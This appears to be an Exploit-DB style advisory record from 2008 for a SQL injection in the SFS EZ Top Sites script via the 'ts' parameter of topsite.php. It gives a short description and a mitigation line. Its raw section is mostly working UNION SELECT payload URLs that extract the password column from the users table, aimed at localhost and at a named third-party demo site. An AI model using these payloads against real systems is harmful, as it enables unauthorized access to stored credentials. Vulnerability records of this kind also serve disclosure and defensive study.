SFS EZ Top Sites Remote sql Injection

vendor:

SFS EZ Top Sites

by:

Mountassif Moad

7.5

CVSS

HIGH

Sql injection

CWE

Product Name: SFS EZ Top Sites

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SFS EZ Top Sites Remote sql Injection

A remote SQL injection vulnerability exists in SFS EZ Top Sites. The vulnerability is due to insufficient sanitization of user-supplied input to the 'ts' parameter in 'topsite.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow an attacker to gain access to sensitive information from the back-end database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically construct SQL queries.

Source

Exploit-DB raw data:

###########################################################################
# Kira has decide be back after halloween
###########################################################################
# Discovered by : Mountassif Moad
# Type Gap : Sql injection
# Script : SFS EZ Top Sites  Remote sql Injection
# Home Script : http://www.scripts-for-sites.info/item.php?item=112
# Greetz : Allah , All my freind
##########################################################################

http://localhost/topsites/topsite.php?ts=-1/**/UNION/**/SELECT/**/1,password,3,4,5+from+users/*

Demo :

http://turnkeyzone.com/demos/topsites/topsite.php?ts=-1/**/UNION/**/SELECT/**/1,password,3,4,5+from+users/*
http://turnkeyzone.com/demos/topsites/topsite.php?ts=-169%20union%20select%201,2,3,4,5/*

# milw0rm.com [2008-10-31]